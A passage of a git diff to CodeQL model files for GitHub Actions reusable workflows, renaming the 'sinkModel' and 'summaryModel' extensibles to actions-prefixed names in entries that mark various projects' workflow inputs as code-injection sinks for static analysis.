a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["0xpolygon/polygon-edge/.github/workflows/loadtest.yml", "*", "input.scenario", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml index f3bfa556ee5..9746a118691 100644 --- a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["8vim/8vim/.github/workflows/publish.yaml", "*", "input.version_code", "code-injection", "generated"] - ["8vim/8vim/.github/workflows/publish.yaml", "*", "input.version_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml index f8c4e3c68be..6208645b1b7 100644 --- a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.base-pr-branch", "code-injection", "generated"] - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.head-pr-branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml index 793136cc3d3..e66e7326701 100644 --- a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.namespace-repository", "code-injection", "generated"] - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.file-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml index e46601a7bff..471ce3a672a 100644 --- a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "input.qemu", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml index 558ff908edf..1af30be9f35 100644 --- a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "input.qemu", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml index a477e289d9e..ee3d9d0a8ef 100644 --- a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["airbytehq/airbyte/.github/workflows/connector-performance-command.yml", "*", "input.connector", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml index a72ace81445..493594e3b81 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["alphagov/collections/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml index 26c0794a19c..a437581ba83 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["alphagov/frontend/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml index 5ad39d5e184..489e005cc0e 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["alphagov/publishing-api/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml index 3c790f81d74..3a0e723e9f7 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.module", "code-injection", "generated"] - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.jdk", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml index 50fdcfd5a2d..893be8a2725 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "input.environment", "code-injection", "generated"] - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "input.workflow-caller-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml index 6363564503c..75877fa48aa 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/spark/.github/workflows/build_and_test.yml", "*", "input.branch", "code-injection", "generated"] - ["apache/spark/.github/workflows/build_and_test.yml", "*", "input.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml index fce736676fe..489e6134eba 100644 --- a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["argilla-io/argilla/.github/workflows/run-python-tests.yml", "*", "input.pytestArgs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml index 593322a739e..4feef931f71 100644 --- a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.ghcr_image_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml index b3984a7ab83..189cd8bbafd 100644 --- a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.ghcr_image_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml index a6f1bd4569d..418694a596d 100644 --- a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aws-amplify/amplify-ui/.github/workflows/reusable-tagged-publish.yml", "*", "input.dist-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml index b661a1fa26a..10c4f8a3e3c 100644 --- a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["azure/apiops/tools/github_workflows/run-publisher-with-env.yaml", "*", "input.API_MANAGEMENT_SERVICE_OUTPUT_FOLDER_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml index 0f58971041d..1837a505499 100644 --- a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["azure/mlops-templates/.github/workflows/tf-gha-install-terraform.yml", "*", "input.terraform_workingdir", "code-injection", "generated"] - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "input.parameters-file", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml index f12a337d71d..094e4602e8e 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml index 76796b4ae38..ec264f96bf1 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml index 8cc08edff5d..7463396b152 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "input.shell", "code-injection", "generated"] - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "input.environment", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml index c2963eb76f4..4c52a10d4f1 100644 --- a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bdunderscore/modular-avatar/.github/workflows/build-test-docs.yml", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml index 66aea90b41a..a6c5a8b8e3b 100644 --- a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["benc-uk/workflow-dispatch/.github/workflows/echo-3.yaml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml index 49ed7bca899..286e75fc9e2 100644 --- a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.REGISTRY", "code-injection", "generated"] - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.IMAGE_NAME", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml index fd0a2d9110a..9ea5a9a34c7 100644 --- a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bugsnag/bugsnag-ruby/.github/workflows/run-maze-runner.yml", "*", "input.features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml index 1a3bdd1b380..34e41e9c589 100644 --- a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.the_path", "code-injection", "generated"] - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.last_commit", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml index 6185f9d03d0..cc38156973b 100644 --- a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "input.destination-tag", "code-injection", "generated"] - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "input.origin-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml index 273bbc69540..748287e75f8 100644 --- a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cemu-project/cemu/.github/workflows/build.yml", "*", "input.experimentalversion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml index 3aac3af3cae..703a138d28d 100644 --- a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "input.unreal-program-name", "code-injection", "generated"] - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "input.test-package-base-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml index 9887b8e5f3a..97f1bafd1f3 100644 --- a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cgal/cgal/.github/workflows/send_email.yml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml index 4c6379fd94b..064c946363f 100644 --- a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["checkstyle/checkstyle/.github/workflows/release-upload-all-jar.yml", "*", "input.version", "code-injection", "generated"] - ["checkstyle/checkstyle/.github/workflows/release-update-xdoc-with-releasenotes.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml index 35738fe6c0f..4a5c66bc744 100644 --- a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "input.docker-context", "code-injection", "generated"] - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "input.image_subpath", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml index 77db768cf32..a1e4b624b45 100644 --- a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "input.scala", "code-injection", "generated"] - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "input.circt", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml index 509de954646..888aed947da 100644 --- a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.test_name", "code-injection", "generated"] - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "input.run_command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml index 6e0e2865e83..3b5f69e9342 100644 --- a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cloudfoundry/cli/.github/workflows/tests-integration-reusable.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml index 69667ce10b1..8e28b46f2c7 100644 --- a/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cloudposse_github-action-matrix-outputs-write.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["cloudposse/github-action-matrix-outputs-write/.github/workflows/setup-test.yml", "*", "input.matrix-key", "output.result", "taint", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml index 175012c10c9..7f63b48ed84 100644 --- a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.nox_session_test_sim", "code-injection", "generated"] - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "input.nox_session_test_nosim", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml index 84a834d9a1f..e7e42031e04 100644 --- a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "input.extra-composer-options", "code-injection", "generated"] - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "input.php-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml index 2946a78cf83..0c34609ccef 100644 --- a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "input.millargs", "code-injection", "generated"] - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "input.buildcmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml index 7ce68d84ca5..82de946e406 100644 --- a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.upgrade-plan-name", "code-injection", "generated"] - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "input.chain-upgrade-tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml index 8e3b9ccc0f8..09c4c2a83c3 100644 --- a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "input.latest", "code-injection", "generated"] - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "input.image_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml index f41e2ee1246..0e4571fc728 100644 --- a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cryptomator/cryptomator/.github/workflows/get-version.yml", "*", "input.version", "code-injection", "generated"] - ["cryptomator/cryptomator/.github/workflows/av-whitelist.yml", "*", "input.url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml index c643a6a9fe0..6a03acfb11d 100644 --- a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - 